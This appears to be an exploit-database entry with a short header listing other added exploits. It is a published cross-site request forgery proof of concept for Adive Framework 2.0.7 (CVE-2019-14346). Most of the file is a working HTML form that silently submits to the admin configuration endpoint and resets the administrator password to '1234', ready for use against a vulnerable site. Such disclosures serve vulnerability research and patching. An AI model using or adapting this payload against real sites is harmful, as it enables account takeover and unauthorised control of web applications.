d82ffc9cd0
7 changes to exploits/shellcodes Baldr Botnet Panel - Arbitrary Code Execution (Metasploit) Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income) Aptana Jaxer 1.0.3.4547 - Local File inclusion Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download Adive Framework 2.0.7 - Cross-Site Request Forgery Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
|
||
# Date:02/08/2019.
|
||
# Exploit Author: Pablo Santiago
|
||
# Vendor Homepage: https://adive.es
|
||
# Software Link: https://github.com/ferdinandmartin/adive-php7
|
||
# Version: 2.0.7
|
||
# Tested on: Windows and Kali linux
|
||
# CVE :2019-14346
|
||
|
||
# 1. Technical Description:
|
||
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
|
||
#Request Forgery vulnerability, an attacker could change any user
|
||
password.
|
||
|
||
# 2. Proof Of Concept (CODE):
|
||
|
||
<html>
|
||
<body>
|
||
<script>history.pushState('', '', '/')</script>
|
||
<form action="http://localhost/adive/admin/config" method="POST">
|
||
<input type="hidden" name="userName" value="admin" />
|
||
<input type="hidden" name="confPermissions" value="1" />
|
||
<input type="hidden" name="pass" value="1234" />
|
||
<input type="hidden" name="cpass" value="1234" />
|
||
<input type="hidden" name="invokeType" value="web" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html>
|
||
|
||
# 3. References:
|
||
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
|
||
# https://imgur.com/apuZa9q |